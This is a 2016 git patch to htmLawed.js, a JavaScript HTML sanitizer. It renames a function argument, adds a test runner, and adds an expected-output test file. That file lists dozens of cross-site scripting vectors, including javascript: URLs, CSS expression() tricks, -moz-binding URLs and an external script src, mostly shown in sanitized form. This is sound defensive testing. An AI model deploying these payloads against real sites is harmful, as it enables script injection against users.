From a5778a95c3d78206a18a7484d424fcd3f615823a Mon Sep 17 00:00:00 2001
From: Vitaliy Filippov <vitalif@yourcmc.ru>
Date: Tue, 5 Jul 2016 16:15:15 +0300
Subject: [PATCH] add some tests, rename hl_bal function arg

---
 htmLawed-test.js          |  23 +-
 htmLawed.js               |  18 +-
 htmLawed_TESTCASE_out.htm | 450 ++++++++++++++++++++++++++
 rsnake_xss.txt            | 642 ++++++++++++++++++++++++++++++++++++++
 test-htmLawed.sh          |   2 +-
 test_php.htm              |  42 ---
 test_xss.txt              |  44 ---
 7 files changed, 1124 insertions(+), 97 deletions(-)
 create mode 100644 htmLawed_TESTCASE_out.htm
 create mode 100644 rsnake_xss.txt
 delete mode 100644 test_php.htm
 delete mode 100644 test_xss.txt
diff --git a/htmLawed-test.js b/htmLawed-test.js
index c89eaa7..e4b06ca 100644
--- a/htmLawed-test.js
+++ b/htmLawed-test.js
@@ -1,3 +1,24 @@
 const fs = require('fs');
 const htmLawed = require('./htmLawed.c.js');
-console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
+
+var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
+var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
+if (out1 == check1)
+    console.log("[TESTCASE.txt] OK");
+else
+{
+    console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
+    fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
+}
+
+var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
+var m;
+while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
+{
+    var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
+    if (output === m[4])
+        console.log("["+m[1]+"] "+m[2]+": OK");
+    else
+        console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
+    tests = tests.substr(m[0].length);
+}
diff --git a/htmLawed.js b/htmLawed.js
index d25de23..49dcc21 100644
--- a/htmLawed.js
+++ b/htmLawed.js
@@ -161,8 +161,8 @@ var htmLawed = module.exports =
             t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
         if (C.tidy)
             t = htmLawed.hl_tidy(t, C.tidy, C.parent);
-        return t;
         // eof
+        return t;
     },
     hl_attrval: function(a, t, p)
     {
@@ -208,10 +208,10 @@ var htmLawed = module.exports =
         return (r.length > 0 ? r.join(s) : (p['default'] || 0));
         // eof
     },
-    hl_bal: function(t, perf, intag)
+    hl_bal: function(t, keep_bad, intag)
     {
-        if (perf === undefined)
-            perf = 1;
+        if (keep_bad === undefined)
+            keep_bad = 1;
         // balance tags
         // by content
         var cont = {};
@@ -271,7 +271,7 @@ var htmLawed = module.exports =
         // intag sets allowed child
         intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
         if (cont.E[intag])
-            return (!perf ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
+            return (!keep_bad ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
         var inOk = getCont(intag);
         var ok = {}, q = [], ql; // q = seq list of open non-empty ele
         var _ob = '';
@@ -421,13 +421,13 @@ var htmLawed = module.exports =
                 delete cont.I['ins'];
             }
             // bad tags, & ele content
-            if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
+            if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
                 _ob += '&lt;'+s+e+a+'&gt;';
             if (x !== '' && x !== null)
             {
                 if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
                     _ob += '<div>'+x+'</div>';
-                else if (perf < 3 || ok['#pcdata'])
+                else if (keep_bad < 3 || ok['#pcdata'])
                     _ob += x;
                 else if (x.indexOf("\x02\x04") >= 0)
                 {
@@ -435,10 +435,10 @@ var htmLawed = module.exports =
                     for (var _i = 0; _i < x.length; _i++)
                     {
                         var v = x[_i];
-                        _ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
+                        _ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
                     }
                 }
-                else if (perf > 4)
+                else if (keep_bad > 4)
                     _ob += x.replace(/\S+/g, '');
             }
         }
diff --git a/htmLawed_TESTCASE_out.htm b/htmLawed_TESTCASE_out.htm
new file mode 100644
index 0000000..906f663
--- /dev/null
+++ b/htmLawed_TESTCASE_out.htm
@@ -0,0 +1,450 @@
+/*
+htmLawed_TESTCASE.txt, 27 February 2016
+htmLawed 1.1.22, 5 March 2016
+Copyright Santosh Patnaik
+Dual licensed with LGPL 3 and GPL 2+
+A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
+*/
+
+This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
+
+************************************************
+when viewing this file in a web browser, set the
+character encoding to Unicode/UTF-8
+************************************************
+
+--------------------- start --------------------
+
+<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
+
+<h6>Attributes</h6>
+
+<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
+<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" /><br />
+<strong>Required:</strong> <img src="src" alt="image" />, <img alt="image" src="src" /><br />
+<strong>Quote &amp; space variation:</strong> <a id="id1" name="xy">a</a>, <a id="id2" name="xy">a</a>, <a id="id3" name="n">a</a><br />
+<strong>Invalid:</strong> <a id="id4">a</a><br />
+<strong>Duplicated:</strong> <a id="id6">a</a><br />
+<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr style="border-style: none; border: 0; background-color: gray; color: gray;" /><br />
+<strong>Casing:</strong> <a href=""></a><br />
+<strong>Custom:</strong> <img alt="image" src="src" /><br />
+<strong>Data-*:</strong> <a>a</a><br />
+<strong>Admin-restricted?:</strong> <a href="x"></a>
+
+<h6>Attribute values</h6>
+
+<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a></a><br />
+(try 'my_' for prefix)<br />
+<strong>Double-quotes in value:</strong><a title="ab"></a>, <a title="ab"></a>, <a title="ab&quot;c"></a><br />
+(try filter for CSS expression)<br />
+<strong>CSS expression</strong>: <div style="prop: ();"></div><div style="prop: ()"></div><div style="prop:  ();"></div><div style="prop :  ()"></div><div style="prop: (js);"></div><div style="prop: (js;)"></div><div style="prop:  ('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop: ( 'js&#x40; );"></div><br />
+<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
+(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
+
+<h6>Blockquotes</h6>
+
+<blockquote><div>abc</div></blockquote><br />
+<blockquote><div>abc<div>def</div></div></blockquote><br />
+<blockquote><div>abc</div><div>def</div></blockquote><br />
+<blockquote><div>abc<div>def</div>ghi</div></blockquote><br />
+abc<div>def</div>ghi<br />
+<blockquote><div>QQQ<div>x</div>&lt;!-- comment --&gt;</div></blockquote><br />
+<blockquote><div>x</div><div>&lt;!-- comment --&gt;QQQ</div></blockquote><br />
+<blockquote><div>&lt;!-- comment --&gt;<div>x</div>QQQ<div>x</div></div></blockquote><br />
+<blockquote><div>x&lt;!-- comment --&gt;</div><div>QQQ</div></blockquote><p>x</p><br />
+<br />
+(try with blockquote parent)
+
+<h6>CDATA sections</h6>
+
+<strong>Special characters inside:</strong> &lt;![CDATA[ ]]&gt; ]]&gt;, &lt;![CDATA[ 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 ]]&gt;<br />
+<strong>Normal:</strong> &lt;![CDATA[ check ]]&gt;, <em>CDATA follows:&lt;![CDATA[ check ]]&gt;</em><br />
+<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt;![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
+<strong>Invalid:</strong> <em>&gt;CDATA in tag content</em>, <table>&lt;![CDATA[ check ]]&gt;<tr><td>text not allowed</td></tr></table>
+
+<h6>Complex-1: deprecated elements</h6>
+
+<div style="text-align: center;">
+The PHP <span style="text-decoration: line-through;">software</span> script used for this <span style="text-decoration: line-through;">web-page</span> webpage is <span style="font-weight: bold; font-size: 200%; color: red; font-family: arial;">htmLawedTest.php</span>, from <span style="color:green; text-decoration: underline;">PHP Labware</span>.
+</div>
+
+<h6>Complex-2: deprecated attributes</h6>
+
+<img src="s" alt="a" id="n" /><img src="s" alt="a" id="id9" />
+<br style="clear: left;" />
+<hr style="border-style: none; border: 0; background-color: gray; color: gray; size: 1px;" />
+<img src="s" alt="image" width="10em" height="20" style="padding:5px; float: left; margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px; border: 1px;" id="id10" />
+<table width="50em" style="margin: auto; background-color: red;">
+     <tr>
+      <td style="width: 20%;">
+       <div style="margin: auto;">
+        <h3 style="text-align: right;">Section</h3>
+        <p style="text-align: right;">Para</p>
+        <ol style="list-style-type: lower-latin;"><li><a name="x" id="x">First</a> <a name="x" id="id11">item</a></li></ol>
+       </div>
+      </td>
+      <td style="width: auto;">
+       <ol style="list-style-type: decimal;"><li>First item</li></ol>
+      </td>
+     </tr>
+    </table>
+<br style="clear: both;" />
+
+<h6>Complex-3: embed, object, area</h6>
+
+&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;<br />
+
+&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;<br />
+
+&lt;object data="1.gif" type="image/gif" usemap="#map1"&gt;<map name="map1" id="map1">
+<p>navigate the site: <a href="1" shape="rect" coords="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
+<area href="5" shape="rect" coords="0,0,118,28" alt="area" />
+</map>&lt;/object&gt;
+
+&lt;param name="name" /&gt;value&lt;/param&gt;
+
+&lt;object id="obj1"&gt;
+   &lt;param name="param1" /&gt;
+   &lt;object id="obj2"&gt;
+      &lt;param name="param2" /&gt;
+   &lt;/object&gt;
+&lt;/object&gt;
+
+<h6>Complex-4: nested and other tables</h6>
+
+<table border="1" style="background-color: red;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" style="background-color: green;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
+<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
+<strong>Missing tr:</strong> <table>&lt;td&gt;Well&lt;/td&gt;</table><br />
+
+<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
+
+(Try different 'keep_bad' values)
+&lt;*&gt; Pseudotags &lt;*&gt;
+&lt;xml&gt;Non-HTML tag xml&lt;/xml&gt;
+<p>
+Disallowed tag p
+</p>
+<ul>Bad<li>OK</li></ul>
+
+<h6>Elements</h6>
+
+<strong>Unbalanced:</strong> <a href="h"><em>check</em></a>&lt;/em&gt;<br />
+<strong>Non-XHTML:</strong> <div><div style="text-align: center;"><ul></ul></div></div><br />
+<strong>Malformed:</strong> &lt; a href=""&gt;&lt;/a&gt;, <a href=""></a>, <a href=""></a>, <a href=""></a>, <a href="">&lt; /a&gt;, &lt; a href=""&gt;</a>, <img src="s" alt="a" />, <img src="s" alt="a" />, &lt;imgsrc="s" alt="a" /&gt;<br />
+<strong>Invalid:</strong> &lt;image src="s" alt="a" /&gt;<br />
+<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a" />&lt;/img&gt;, <img src="s" alt="a" />text&lt;/img&gt;<br />
+<strong>Content invalid:</strong> <a href="h">1</a><a>2</a>&lt;/a&gt;<br />
+<strong>Content invalid?:</strong> <form action="action"></form><br /> (try setting 'form' as parent)<br />
+<strong>Casing:</strong> <a href=""></a><br />
+<strong>Check for tidy:</strong> <br /><hr />&lt;/div&gt;<hr />&lt;/div&gt;<hr />&lt;/div&gt;<div>hi</div>
+
+<h6>Entities</h6>
+
+<strong>Special:</strong> &amp; 3 &lt; 2 &amp; 5&gt;4 and j &gt;i &gt;a &amp; i&lt;j&gt;a<br />
+<strong>Padding:</strong> &#66; &#66; &#x66; &#x66; &amp;#x003; &amp;#0003;<br />
+<strong>Malformed:</strong> &amp; #x27;, &amp;x27;, &#x27; &amp;TILDE;, &amp;tilde<br />
+<strong>Invalid:</strong> &amp;#x3;, &amp;#55296;, &amp;#03;, &amp;#1114112;, &amp;#xffff, &amp;bad;<br />
+<strong>Discouraged characters:</strong> &amp;#x7f;, &amp;#132;, &#64992;, &#1114110;<br />
+<strong>Context:</strong> '&gt;', &lt;?<br />
+<strong>Casing:</strong> &#x27;, &#x27;, &amp;TILDE;, &tilde;
+<br />
+(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
+
+<h6>Format</h6>
+
+<strong>Valid but ill-formatted:</strong> text &lt;!-- comment --&gt;
+text &lt;!--
+A   c  o  m  m  e  n  t --&gt;
+&lt;script&gt;
+	&lt;![CDATA[
+		code
+	]]&gt;
+&lt;/script&gt;&lt;!-- comment --&gt;&lt;![CDATA[ cdata ]]&gt; <a>text&lt;/b&gt; text&lt;pre id="none"&gt;p r e&lt;/pre&gt;
+<textarea rows="10" cols="50">text</textarea>	  <textarea rows="10" cols="50">
+	  text	text  
+</textarea>		text  text <br />&lt;hr /&gt;
+text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
+text <img src="none" alt="none" /> 	<b>t<em> e <strong> x </strong> t</em></b>
+	</a><a href="a">	text <img src="none" alt="none" /> 	<b>t <em> e <strong> x </strong> t</em></b>
+	</a>
+<span style="background-color: yellow;">text <img src="none" alt="none" /> 	<b> <em> t e <strong> x </strong> t</em></b></span>
+&lt;script&gt;script&lt;/script&gt;
+<div>
+	<pre>p <a>r</a> e &lt;!-- comment --&gt; </pre>
+		<pre>
+				pre
+		</pre>
+</div>
+<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
+(try to compact or beautify)
+
+<h6>Forms</h6>
+
+(note nesting of 'form', missing required attributes, etc.)<br />
+<form action="action"><div>
+&lt;script type="text/javascript"&gt;s&lt;/script&gt;
+<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1" /></fieldset>
+<input name="h" type="checkbox" value="h" tabindex="20" /> h
+<textarea name="t" rows="10" cols="50">t</textarea>
+</div></form><form action="a" method="get"></form>&lt;/form&gt;<br />
+<form action="b" method="get"><p><input type="text" value="i" /></p></form><br />
+<form action="action"><div>B:<input type="text" value="b" />C:<input type="text" value="c" /></div></form><br />
+(try each of these lines separately)<br />
+<form action="a"><div>what<br />
+</div></form><form action="a"><div>what
+(try with container as div and as form)<br />
+</div></form><form action="action"><div>c <a>a</a> <b>b</b><input />&lt;script&gt;s&lt;/script&gt;
+
+<h6>HTML comments (also CDATA)</h6>
+
+<strong>Script inside:</strong> &lt;!--[if gte IE 4]&gt;
+&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
+&lt;![endif]--&gt;<br />
+<strong>Special characters inside: &lt;!-- &lt;![CDATA check ]]&gt; --&gt;, &lt;!-- 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 --&gt;, &lt;!-- che--ck --&gt;, &lt;!--[if !IE]&gt; &lt;--&gt;<a>c</a>&lt;!--&gt; &lt;![endif]--&gt;<br />
+<strong>Normal:</strong> &lt;!-- check --&gt;, &lt;!--check --&gt;, <em>comment:&lt;!-- check --&gt;</em>&lt;!-- check --&gt;, &lt;table&gt;&lt;!-- check --&gt;&lt;tr&gt;&lt;td&gt;text not allowed&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br />
+<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
+Invalid:</strong> <em>&gt;comment in tag content</em>, &lt;!--check--&gt;
+
+<h6>HTML5</h6>
+
+<strong>figure and figcaption:</strong> &lt;figure&gt;<img src="picture.jpg" alt="picture" />&lt;figcaption&gt;Caption for the awesome picture&lt;/figcaption&gt;&lt;/figure&gt;
+<strong>article:</strong> <h1>A</h1><p>B</p>&lt;article&gt;<h2>C</h2>&lt;/article&gt;&lt;article&gt;<h2>E</h2><p>F</p><p>G</p>&lt;/article&gt;
+<strong>meter</strong>: <p>Heat &lt;meter min="100" max="200" value="150"&gt;150&lt;/meter&gt;.</p>
+<strong>datalist</strong>: <input />&lt;datalist id="b"&gt;&lt;option value="c"&gt;&lt;option value="d"&gt;&lt;/datalist&gt;
+
+<h6>Ins-Del</h6>
+
+(depending on context, these elements can be of either block or inline type)<br />
+<p><ins datetime="d" cite="c">&lt;div&gt;block</ins></p></div>&lt;/ins&gt;&lt;/p&gt;<div><br />
+<p><del>d</del></p><br />
+<p><ins><del>d</del></ins></p><div><ins><p><del>&lt;div&gt;d</del></p></ins></div>&lt;/del&gt;&lt;/p&gt;&lt;/ins&gt;</div><ins><div>d</div></ins>
+
+<h6>Lists</h6>
+
+<div><strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
+<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
+<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
+<strong>Definition lists, nested</strong>: <dl>
+ <dt>T1</dt>
+ <dd>D1</dd>
+ <dt>T2</dt>
+ <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
+ <dt>T3</dt>
+ <dd>D3</dd>
+ <dt>T4</dt>
+ <dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
+</dl><br />
+<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
+ <dt>T1
+ </dt><dd>D1</dd>
+ <dt>T2</dt>
+ <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
+ <dt>T3
+ </dt><dd>D3
+ </dd><dt>T4
+ </dt><dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
+</dl><br />
+<strong>Nested</strong>: <ul>
+ <li>l1</li>
+ <li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
+ <li>l3</li>
+ <li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
+</ul><br />
+<strong>Nested, directly</strong>: <ul>
+ <li>l1</li>
+ &lt;ol&gt;l2&lt;/ol&gt;
+ <li>l3</li>
+</ul><br />
+<strong>Nested, close-tags omitted</strong>: <ul>
+ <li>l1</li>
+ <li>l2<ol><li>lo1</li><li>lo2</li></ol>
+ </li><li>l3
+ </li><li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol>
+</li></ul><br />
+<strong>Complex</strong>:
+<ol>&lt;script&gt;&lt;/script&gt;<li><table><tr><td>
+<ul><li id="search" class="widget widget_search">			</li></ul></td></tr></table></li></ol></div></form><form id="searchform" method="get" action="http://kohei.us">
+			<div>
+
+			<input type="text" name="s" id="s" size="15" /><br />
+			<input type="submit" value="Search" />
+			</div>
+			</form>
+		&lt;/li&gt;&lt;/ul&gt;
+&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/li&gt;&lt;/ol&gt;
+<strong>Menu</strong>: <ul style="list-style-type: decimal;"><li><ul>
+      &lt;button type="button"&gt;New...&lt;/button&gt;
+    </ul></li><li><ul>&lt;button type="button"&gt;Cut...&lt;/button&gt;</ul></li>
+    </ul>
+
+<h6>Microdata</h6>
+
+<div> 
+I am <span>X</span> but people call me <span>Y</span>. 
+Find me at <a href="http://www.xy.com">www.xy.com</a>
+</div>
+
+<h6>Microsoft Word</h6>
+
+<strong>Proprietary tag</strong>: <p class="3DMsoNormal">&lt;o:p&gt;&nbsp;&lt;/o:p&gt;</p><br />
+<strong>XML declaration</strong>: &lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt;<br />
+<strong>XML-invalid character code-point (may not replicate)</strong>: <p class="3DMsoNormal">“Where is he?” asked both Mary – the one so lovely – and Jane.</p>
+
+<h6>Nesting</h6>
+
+<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link">&lt;div&gt;hi&lt;/div&gt;</a><br />
+
+<h6>Non-English text-1</h6>
+
+Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
+გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
+večjezično računalništvo<br />
+<a title="อ.อ่าง">อ.อ่าง</a><br />
+<a title="הירשמו כעת לכנס">Зарегистрируйтесь сейчас
+на Десятую Международную Конференцию по</a><br />
+(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
+
+<h6>Non-English text-2: entities</h6>
+
+&#29992;&#32479;&#19968;&#30721;<br />
+&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br />
+Inscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz
+na Alemanha.
+
+<h6>Ruby</h6>
+
+(need compatible browser)<br />
+<ruby xml:lang="ja">
+  <rbc>
+    <rb>斎</rb>
+    <rb>藤</rb>
+    <rb>信</rb>
+    <rb>男</rb>
+  </rbc>
+  <rtc class="reading">
+    <rt>さい</rt>
+    <rt>とう</rt>
+    <rt>のぶ</rt>
+    <rt>お</rt>
+  </rtc>
+  <rtc class="annotation">
+    <rt xml:lang="en">W3C Associate Chairman</rt>
+  </rtc>
+</ruby><br />
+<ruby>
+  <rb>WWW</rb>
+  <rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
+</ruby><br />
+<ruby>
+  A
+  <rp>(</rp><rt>aaa</rt><rp>)</rp>
+</ruby>
+
+
+<h6>Tables</h6>
+
+<strong>Omitted closing tags:</strong> <table>
+<colgroup><col style="x" /><col style="y" />
+</colgroup><thead>
+<tr><th>h1c1</th><th>h1c2
+</th></tr></thead><tbody>
+<tr><td>r1c1</td><td>r1c2
+</td></tr><tr><td>r2c1</td><td>r2c2
+</td></tr></tbody></table><br />
+<strong>Nested, omitted closing tags:</strong> <table>
+<colgroup><col style="x" /><col style="y" />
+</colgroup><thead>
+<tr><th>h1c1</th><th>h1c2
+</th></tr></thead><tbody>
+<tr><td>r1c1</td><td>r1c2<table>
+<colgroup><col style="x" /><col style="y" />
+</colgroup><thead>
+<tr><th>h1c1</th><th>h1c2
+</th></tr></thead><tbody>
+<tr><td>r1c1</td><td>r1c2
+</td></tr><tr><td>r2c1</td><td>r2c2
+</td></tr></tbody></table>
+</td></tr><tr><td>r2c1</td><td>r2c2
+</td></tr></tbody></table><br />
+
+<h6>Tag transformation</h6>
+<strong>Font element intended as 'inline' element:</strong> <p><span style="color: red;">hi</span></p><br />
+<strong>Font element intended as 'block' element:</strong> <div><span style="color: red;">&lt;div&gt;hi</span></div>&lt;/span&gt;&lt;/div&gt;<br />
+<strong>Font element intended as 'block' element:</strong> <div style="text-align: center;"><span style="color: red; font-family: serif, 'Times';">&lt;div&gt;hi</span></div><div>QQQ</div>&lt;/span&gt;&lt;/div&gt;<br />
+
+<h6>Tidy</h6>
+<strong>White-space handling:</strong> abc<em> def </em> ghi   abc <em>def</em> ghi
+
+<h6>URLs</h6>
+
+<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
+(try base URL value of 'http://a.com/b/')<br />
+<strong>CSS URLs:</strong> <div style="background-image: url('denied:a.gif');"></div>, <div style="background-image: URL(&quot;denied:a.gif&quot;);"></div>, <div style="background-image: url('denied:http://a.com/a.gif');"></div>, <div style="background-image: url('denied:./../a.gif');"></div>, <div style="background-image: url('denied:js:xss')"></div><br />
+<strong>Double URLs:</strong> <a style="behaviour: url(denied:foo) url(denied:http://example.com/xss.htc)">b</a><br />
+<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, </a><a href="denied:http://c.com/d.f"></a><br />
+<strong>Soft-hyphen:</strong> <a href="http://q=ídis c">ídis­c</a>
+
+<h6>XSS</h6>
+
+<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
+'';!--"&lt;xss&gt;=&amp;{()}<br />
+<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
+<img src="denied:javascript:alert('xss');" alt="image" /><br />
+<img src="denied:java script:alert('xss');" alt="image" /><br />
+<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
+<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
+<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
+&lt;div style="javascript:alert('xss');"&gt;&lt;/div&gt;<br />
+&lt;div style="background-image:url(denied:javascript:alert('xss'));"&gt;&lt;/div&gt;<br />
+&lt;div style="background-image:url(&quot;denied:javascript:alert('xss')&quot; );"&gt;&lt;/div&gt;<br />
+&lt;!--[if gte IE 4]&gt;&lt;script&gt;alert('xss');&lt;/script&gt;&lt;![endif]--&gt;<br />
+&lt;script a="&gt;" src="http://ha.ckers.org/xss.js"&gt;&lt;/script&gt;<br />
+&lt;div style="background-image: url('denied:js:xss')"&gt;&lt;/div&gt;<br />
+<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
+<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
+<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
+<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background:  (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background:  (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: exp  */ression(alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: exp   */ression(alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background:  x */ (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="xxx" style="background:  */ */ (alert('xss'));">xxx</a><br />
+<strong>Bad IE7:</strong> <a href="x" style="width:  *** *;;;;;;*/  */(alert('xss'));">x</a><br />
+<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
+<strong>Bad IE7:</strong> <a href="x" style="background: huh   */ */ (alert('xss'));">x</a><br />
+<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
+<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/  /pression(alert(&quot;XSS&quot;))">x</a><br />
+<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
+<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
+<strong>Bad IE7:</strong> <a style="color:  065  078  070  072  065  073  073  069  06f  06e  028  061  06c  065  072  074  028  031  029  029">test</a><br />
